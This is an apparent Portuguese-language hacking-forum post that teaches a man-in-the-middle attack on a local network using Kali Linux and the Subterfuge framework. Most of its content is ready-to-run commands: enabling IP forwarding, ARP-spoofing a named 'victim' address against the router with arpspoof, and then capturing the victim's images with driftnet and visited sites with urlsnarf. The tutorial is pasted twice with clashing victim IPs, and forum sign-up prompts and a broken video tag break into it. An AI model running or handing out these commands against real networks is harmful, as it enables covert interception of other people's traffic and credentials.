Ataque MITM (Man in the Midle) com Kali LINUX E Subterfuge
O man-in-the-middle (pt: Homem no meio, em referência ao atacante que intercepta os dados) é uma forma de ataque em que os dados trocados entre duas partes, por exemplo você e o seu banco, são de alguma forma interceptados, registados e possivelmente alterados pelo atacante sem que as vitimas se apercebam. Numa comunicação normal os dois elementos envolvidos comunicam entre si sem interferências através de um meio, aqui para o que nos interessa, uma rede local à Internet ou ambas.
Hoje vou mostrar uma maneira de fazer um ataque MITM automaticamente e fácil.
Para fazer isso usaremos a ferramenta Subterfuge.O Subterfúgio é um Framework que faz automaticamente ataques MITM,ela é feita em python.
Atualmente o Subterfuge está na versão 5.0 Beta, para um melhor desempenho se assim podemos dizer vamos usar o kali linux,(ARP MITM, coleta de credenciais, a injeção de código, TunnelBlock, etc).
Agora antes de tudo vamos instalar o Subterfúgio:
Apenas usuários registrados e ativados podem ver os links., Feito isso vamos realizar um arpspoof
Código HTML:
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
Código HTML:
driftnet -i eth0
Tutorial: Como fazer um ataque MITM no Kali Linux
postado em Dezembro 16, 2013 by Hernane Carvalho | Nenhum Comentário
Olá a todos
Gostaria de mostrar como usar o Kali Linux para realizar um ataque do tipo MITM (Man in the Middle)
Vamos imaginar o seguinte cenário que deve ser adaptado a sua circunstância
IP do roteador no meu caso 192.168.1.1
IP da vítima no meu caso 192.166.1.106
Com essas informações vamos fazer o seguinte:
Abra um terminal e digite
echo 1 > /proc/sys/net/ipv4/ip_forward
Feito isso vamos realizar um arpspoof
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
Deixe o comando acima executando e abra outro terminal e digite
driftnet -i eth0
Será exibido uma tela semelhante a abaixo onde é possível visualizar todo tráfego de imagens, para fazer um teste vá no computador vítima e faça uma busca de imagens no google.
Para parar o comando acima basta digitar CTRL+C
Para rastrear todo site acessado pela vítima digite o comando
Código HTML:
urlsnarf -i eth0
[SIZE="3"]Apenas usuários registrados e ativados podem ver os links., [URL=https://forum.guiadohacker.com.br/vb5/register]Clique aqui para se cadastrar...]https://www.youtube.com/watch?v=PbiXMlhykSQ[/ame]
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++
Complementando
Vamos imaginar o seguinte cenário que deve ser adaptado a sua circunstância
IP do roteador no meu caso 192.168.1.1
IP da vítima no meu caso 192.166.1.106
Com essas informações vamos fazer o seguinte:
Abra um terminal e digite
Código HTML:
echo 1 > /proc/sys/net/ipv4/ip_forward
Código HTML:
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
Código HTML:
driftnet -i eth0
Tutorial: Como fazer um ataque MITM no Kali Linux
postado em Dezembro 16, 2013 by Hernane Carvalho | Nenhum Comentário
Olá a todos
Gostaria de mostrar como usar o Kali Linux para realizar um ataque do tipo MITM (Man in the Middle)
Vamos imaginar o seguinte cenário que deve ser adaptado a sua circunstância
IP do roteador no meu caso 192.168.1.1
IP da vítima no meu caso 192.166.1.106
Com essas informações vamos fazer o seguinte:
Abra um terminal e digite
echo 1 > /proc/sys/net/ipv4/ip_forward
Feito isso vamos realizar um arpspoof
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
Deixe o comando acima executando e abra outro terminal e digite
driftnet -i eth0
Será exibido uma tela semelhante a abaixo onde é possível visualizar todo tráfego de imagens, para fazer um teste vá no computador vítima e faça uma busca de imagens no google.
Para parar o comando acima basta digitar CTRL+C
Para rastrear todo site acessado pela vítima digite o comando
Código HTML:
urlsnarf -i eth0
Apenas usuários registrados e ativados podem ver os links., [URL=https://forum.guiadohacker.com.br/vb5/register]Clique aqui para se cadastrar...
" data-vcode="PbiXMlhykSQ[/ame" data-vprovider="youtube"
>